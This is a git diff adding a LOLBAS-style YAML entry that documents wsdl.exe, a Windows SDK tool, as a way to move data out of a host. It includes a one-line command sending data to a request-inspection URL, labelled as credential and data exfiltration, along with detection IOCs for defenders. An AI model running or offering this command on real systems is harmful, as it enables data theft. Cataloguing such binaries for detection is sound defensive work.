Create Wsdl.yml

yml/OtherMSBinaries/Wsdl.yml

@@ -0,0 +1,31 @@
+---
+Name: wsdl.exe
+Description: The Web Services Description Language(WSDL) is an XML-based interface description language that is used for describing the functionality offered by a web service. The acronym is also used for any specific WSDL description of a web service (also referred to as a WSDL file), which provides a machine-readable description of how the service can be called, what parameters it expects, and what data structures it returns. Therefore, its purpose is roughly similar to that of a type signature in a programming language.
+Author: 'Ialle Teixeira'
+Created: 2022-03-28
+Commands:
+  - Command: wsdl.exe /server https://requestinspector.com/insp/inspect/XXXXXXXXXXXXXXX
+    Description: Upload file, credentials or data exfiltration in general
+    Usecase: Upload file
+    Category: Upload
+    Privileges: User
+    MitreID: T1567
+    OperatingSystem: Windows 10
+Full_Path:
+  - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wsdl.exe
+Code_Sample:
+  - Code:
+Detection:
+  - IOC: wsdl.exe storing data into alternate data streams.
+  - IOC: Preventing/Detecting wsdl.exe with non-RFC1918 addresses by Network IPS/IDS.
+  - IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching wsdl.exe file.
+  - IOC: User Agent is "Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 4.0.30319.42000)"
+Resources:
+  - Link: https://docs.microsoft.com/en-us/windows/win32/wsw/portal
+  - Link: https://en.wikipedia.org/wiki/Web_Services_Description_Language
+  - Link: https://social.msdn.microsoft.com/Forums/pt-BR/e15ce975-49c4-4aae-9b26-d66dc34ea122/como-utilizar-wsdlexe?forum=aspnetpt
+  - Link: https://pt.stackoverflow.com/questions/29116/o-que-%C3%A9-wsdl-web-services-description-language
+Acknowledgement:
+  - Person: Ialle Teixeira
+    Handle: 'in@isdebuggerpresent'
+---